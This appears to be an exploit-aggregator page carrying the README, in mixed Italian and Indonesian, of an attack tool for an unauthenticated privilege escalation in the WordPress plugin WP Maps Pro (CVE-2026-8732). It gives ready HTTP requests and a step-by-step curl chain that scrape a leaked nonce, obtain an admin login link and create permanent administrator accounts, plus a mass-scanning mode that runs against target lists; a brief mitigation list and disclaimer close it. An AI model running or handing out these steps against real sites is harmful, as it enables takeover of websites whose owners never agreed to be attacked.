Sploitus

Exploit for CVE-2026-8732

kitploit Β· 2026-08-23

Exploit Code

MARKDOWN391 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZYCODER0DAY-CVE-2026-8732
# βš”οΈ CVE-2026-8732

### WP Maps Pro ≀ 6.1.0 β€” Escalation dei Privilegi Non Autenticata

![CVSS 9.8 CRITICAL](https://img.shields.io/badge/CVSS-9.8-CRITICAL-red?style=for-the-badge) ![CWE-306](https://img.shields.io/badge/CWE-306-Missing_Auth-orange?style=flat-square) ![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue?style=flat-square) ![License MIT](https://img.shields.io/badge/License-MIT-green?style=flat-square)

**Automazione dell'Exploit in 8 Fasi | Multiprocessing + Asyncio | Creazione Admin Verificata**

* * *

## 🎯 Informazioni sulla Vulnerabilità

Il plugin WordPress **WP Maps Pro** versione ≀ 6.1.0 presenta una vulnerabilitΓ  di **escalation dei privilegi senza autenticazione**. Un attaccante senza alcuna credenziale puΓ² creare un account **amministratore** e prendere il controllo del sito.

La vulnerabilitΓ  deriva dalla funzionalitΓ  "Temporary Access", progettata per il team di supporto del vendor FlipperCode, ma esposta al pubblico senza un'adeguata protezione.

* * *

## πŸ”₯ Tre Debolezze Correlate

root@kitploit:~
    
    
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚  KELEMAHAN 1 β€” Endpoint Terekspos Tanpa Autentikasi        β”‚
    β”‚  β–Έ AJAX action didaftarkan dengan wp_ajax_nopriv_           β”‚
    β”‚  β–Έ Siapapun bisa mengakses tanpa login                      β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚  KELEMAHAN 2 β€” Nonce Bocor di Halaman Publik               β”‚
    β”‚  β–Έ Objek wpgmp_local.nonce disematkan di setiap halaman    β”‚
    β”‚  β–Έ Penyerang bisa mengekstrak nonce dari HTML source        β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                           β”‚
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚  KELEMAHAN 3 β€” Tidak Ada Pemeriksaan Hak Akses             β”‚
    β”‚  β–Έ Fungsi callback hanya memverifikasi nonce               β”‚
    β”‚  β–Έ Tidak ada current_user_can() β€” tidak ada pertahanan lainβ”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
    

* * *

## ⚑ Catena d'Attacco β€” 8 Fasi

root@kitploit:~
    
    
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ FASE 1  │──▢│ FASE 2   │──▢│ FASE 3   │──▢│ FASE 4   β”‚
      β”‚ RESOLVE β”‚   β”‚ CHECK WP β”‚   β”‚ DETECT   β”‚   β”‚ VERSION  β”‚
      β”‚ HTTPS?  β”‚   β”‚ wp-contentβ”‚   β”‚ PLUGIN   β”‚   β”‚ ≀6.1.0?  β”‚
      β”‚ HTTP?   β”‚   β”‚ wp-login  β”‚   β”‚ wpgmp_   β”‚   β”‚ WAF?     β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”˜
                                                          β”‚ RENTAN
                                                          β–Ό
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚                    FASE 5 β€” EKSTRAKSI NONCE               β”‚
      β”‚                                                          β”‚
      β”‚  GRUP A (API)          GRUP B (Konten)      GRUP C      β”‚
      β”‚  β”œβ”€ M1: REST pages    β”œβ”€ M4: Sitemap XML   └─ M7: Slug  β”‚
      β”‚  β”œβ”€ M2: REST search   β”œβ”€ M5: Homepage links    Brute    β”‚
      β”‚  └─ M3: rest_route    └─ M6: RSS/Atom feed   Force     β”‚
      β”‚                                                          β”‚
      β”‚  Target: wpgmp_local.nonce = "fc-call-nonce"             β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                 β”‚ NONCE DITEMUKAN
                                 β–Ό
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ FASE 6   │──▢│ FASE 7   │──▢│ FASE 8   β”‚
      β”‚ EXPLOIT  β”‚   β”‚ VERIFY   β”‚   β”‚ ADD ADMINβ”‚
      β”‚ POST AJAXβ”‚   β”‚ Magic URLβ”‚   β”‚ PERMANEN β”‚
      β”‚ nonce+   β”‚   β”‚ Cookie   β”‚   β”‚ REST API β”‚
      β”‚ check_   β”‚   β”‚ login    β”‚   β”‚ WP-Admin β”‚
      β”‚ temp=falseβ”‚   β”‚ check    β”‚   β”‚ Form     β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                           β”‚
                                           β–Ό
                                   βœ… ADMIN DIBUAT
                                   Login: wp_xxxx / pass
                                   Role: administrator
    

### Dettagli di Ogni Fase

* * *

## πŸ› οΈ Metodi di Attacco

### Metodo 1: Exploit Principale β€” Creazione Admin Senza Autenticazione

root@kitploit:~
    
    
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    action=wpgmp_temp_access_ajax
    nonce=<EKSTRAKSI_NONCE>
    check_temp=false
    

**Risposta se vulnerabile:**

root@kitploit:~
    
    
    {"url":"https://target.com/?wpgmp_access=abc123def456"}
    

> Questa magic URL fornisce un **login automatico** come `fc_user_XXXXX` (ruolo: **administrator**).

### Metodo 2: Aggiungi Admin Permanente tramite REST API

root@kitploit:~
    
    
    POST /wp-json/wp/v2/users HTTP/1.1
    Host: target.com
    X-WP-Nonce: <REST_NONCE>
    Content-Type: application/json
    
    {
      "username": "wp_xxxxxxxx",
      "email": "user@localhost",
      "password": "Str0ng!Pass#2026",
      "roles": ["administrator"]
    }
    

### Metodo 3: Aggiungi Admin tramite Modulo WP-Admin (Backup)

root@kitploit:~
    
    
    POST /wp-admin/user-new.php HTTP/1.1
    Host: target.com
    Cookie: [admin_cookies]
    Content-Type: application/x-www-form-urlencoded
    
    user_login=wp_xxxxxxxx
    email=user@localhost
    pass1=Str0ng!Pass#2026
    pass2=Str0ng!Pass#2026
    pw_weak=1                       <-- KUNCI: konfirmasi password lemah
    role=administrator
    createuser=Add New User
    _wpnonce_create-user=<NONCE>
    

> **Punto chiave:** `pw_weak=1` Γ¨ obbligatorio β€” WordPress rifiuta password deboli senza questo parametro.

* * *

## πŸ“ Architettura

root@kitploit:~
    
    
    CVE-2026-8732.py
    β”‚
    β”œβ”€β”€ πŸ“¦ NonceFinder β€” Pencari nonce dengan 7 metode
    β”‚   β”œβ”€β”€ Grup A (API): M1 REST pages, M2 REST search, M3 rest_route
    β”‚   β”œβ”€β”€ Grup B (Konten): M4 Sitemap, M5 Homepage links, M6 RSS feed
    β”‚   └── Grup C (Paksa): M7 Slug brute force (30+ slug umum)
    β”‚
    β”œβ”€β”€ βš”οΈ Exploiter β€” Mesin eksploitasi 8 fase
    β”‚   β”œβ”€β”€ resolve()           β†’ Fase 1: Pemilihan protokol
    β”‚   β”œβ”€β”€ check_wp()           β†’ Fase 2: Verifikasi WordPress
    β”‚   β”œβ”€β”€ detect_plugin()      β†’ Fase 3: Deteksi plugin + early nonce
    β”‚   β”œβ”€β”€ detect_version()     β†’ Fase 4: Deteksi versi + WAF
    β”‚   β”œβ”€β”€ exploit()            β†’ Fase 6: Eksploitasi inti
    β”‚   β”œβ”€β”€ verify()             β†’ Fase 7: Verifikasi login admin
    β”‚   └── add_admin()          β†’ Fase 8: Tambah admin permanen
    β”‚
    β”œβ”€β”€ πŸ”§ Worker Process β€” Proses pekerja multiprocessing
    β”‚   β”œβ”€β”€ producer()           β†’ Baca domain dari mp.Queue
    β”‚   └── consumer() (N)       β†’ Eksekusi scan paralel
    β”‚
    └── πŸ–₯️ Scanner β€” Antarmuka pengguna
        β”œβ”€β”€ single()             β†’ Mode target tunggal (interaktif)
        └── multi()              β†’ Mode multi-target (massal)
    

### Flusso di Dati

root@kitploit:~
    
    
      targets.txt          mp.Queue (tugas)         asyncio.Queue
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ domain1 │───▢│  domain queue   │───▢│  internal queue  β”‚
      β”‚ domain2 β”‚    β”‚  (IPC antara    β”‚    β”‚  (per proses)    β”‚
      β”‚ domain3 β”‚    β”‚   proses)       β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
      β”‚  ...    β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜              β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                          β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                           β”‚   Konsumen (N)      β”‚
                                           β”‚   Exploiter.scan()  β”‚
                                           β”‚   8 fase lengkap    β”‚
                                           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                     β”‚
                                           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                           β”‚  mp.Queue (hasil)   │──▢ vuln.txt
                                           β”‚  + JSON + TXT       β”‚    + debug.log
                                           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
    

* * *

## πŸš€ Utilizzo

### Installazione

root@kitploit:~
    
    
    pip install aiohttp
    

### ModalitΓ  Target Singolo

root@kitploit:~
    
    
    python3 CVE-2026-8732.py
    

root@kitploit:~
    
    
      [?] Pilih mode:
          1. Single Target
          2. Multi Target (file list)
    
      > 1
    
      [?] Target domain (tanpa http/https): target.com
      [?] Timeout [default: 15]: 15
    

### ModalitΓ  Multi-Target (Massivo)

root@kitploit:~
    
    
    python3 CVE-2026-8732.py
    

root@kitploit:~
    
    
      [?] Pilih mode:
          1. Single Target
          2. Multi Target (file list)
    
      > 2
    
      [?] Path file target (.txt): targets.txt
      [?] Jumlah process [default: 10]: 10
      [?] Concurrency per process [default: 50]: 50
      [?] Timeout per request [default: 10]: 10
      [?] Output file [default: vuln.txt]: vuln.txt
      [?] Debug mode? (y/n) [default: n]: y
    

### Esempio Manuale con curl

root@kitploit:~
    
    
    # LANGKAH 1: Ekstrak nonce dari halaman frontend
    NONCE=$(curl -sk https://target.com/ | grep -oP '"nonce"\s*:\s*"\K[a-f0-9]{10}')
    echo "Nonce: $NONCE"
    
    # LANGKAH 2: Kirim payload eksploitasi
    RESPONSE=$(curl -sk -X POST https://target.com/wp-admin/admin-ajax.php \
      -d "action=wpgmp_temp_access_ajax&nonce=$NONCE&check_temp=false")
    echo "Response: $RESPONSE"
    
    # LANGKAH 3: Akses magic URL untuk login sebagai admin
    MAGIC_URL=$(echo $RESPONSE | python3 -c "import sys,json; print(json.load(sys.stdin)['url'])")
    curl -sk -L -c cookies.txt "$MAGIC_URL"
    
    # LANGKAH 4: Verifikasi akses admin
    curl -sk -b cookies.txt https://target.com/wp-admin/profile.php | grep 'id="user_login"'
    
    # LANGKAH 5: Buat admin permanen via REST API atau WP-Admin form
    

* * *

## πŸ“Š Condizioni di Exploit

L'admin viene creato con successo **SE E SOLO SE** entrambe le condizioni sono soddisfatte:

root@kitploit:~
    
    
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚  KONDISI 1    β”‚ ANDβ”‚  KONDISI 2    β”‚
      β”‚  Versi ≀6.1.0β”‚    β”‚  GOLD AKTIF   β”‚
      β”‚               β”‚    β”‚               β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜    β””β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
              β”‚                    β”‚
              β–Ό                    β–Ό
      Aksi nopriv        WPGMP_Temp_
      masih terdaftar    Access tersedia
              β”‚                    β”‚
              β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                       β–Ό
                 βœ… ADMIN DIBUAT
    

Se la Condizione Fallisce| Risultato  
---|---  
Versione β‰₯ 6.1.1| ❌ **CORRETTA** β€” L'azione `wp_ajax_nopriv_` Γ¨ stata rimossa  
GOLD non attivo| ⚠️ **PHP CRASH** β€” La classe `WPGMP_Temp_Access` non esiste  
  
* * *

## πŸ“ Struttura dei File

root@kitploit:~
    
    
    CVE-2026-8732/
    β”œβ”€β”€ CVE-2026-8732.py      # Skrip eksploitasi otomatis
    β”œβ”€β”€ README.md              # Dokumentasi proyek (file ini)
    └── LICENSE                # MIT License
    

* * *

## βš™οΈ Tecnologie

* * *

## πŸ›‘οΈ Mitigazione

Se sei il proprietario di un sito che utilizza WP Maps Pro:

  1. **Aggiorna alla versione 6.1.1 o successiva** β€” Questo correggerΓ  la vulnerabilitΓ 
  2. **Assicurati che l'addon GOLD sia attivo** β€” Se GOLD Γ¨ installato ma non attivo, il sito rimane in stato vulnerabile (crash durante l'exploit, ma l'azione dannosa resta esposta)
  3. **Installa un WAF** (Wordfence / Sucuri) per bloccare le POST verso `admin-ajax.php`
  4. **Disabilita l'endpoint REST API users** β€” Espone l'elenco degli utenti
  5. **Limita i tentativi di login** β€” Previeni il brute-force



* * *

## πŸ“œ Licenza

root@kitploit:~
    
    
    MIT License
    
    Copyright (c) 2026 XENON1337
    
    Permission is hereby granted, free of charge, to any person obtaining a copy
    of this software and associated documentation files (the "Software"), to deal
    in the Software without restriction, including without limitation the rights
    to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the Software is
    furnished to do so, subject to the following conditions:
    
    The above copyright notice and this permission notice shall be included in all
    copies or substantial portions of the Software.
    
    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
    SOFTWARE.
    

* * *

## ⚠️ Disclaimer

**QUESTO STRUMENTO È SOLO PER USO LEGITTIMO.** Utilizzalo esclusivamente su sistemi di tua proprietà o per i quali hai un'autorizzazione esplicita a testare. L'uso senza autorizzazione è **ILLEGALE** e **NON ETICO**. L'autore **non è responsabile** dell'abuso di questo strumento.

* * *

**Creato daXENON1337**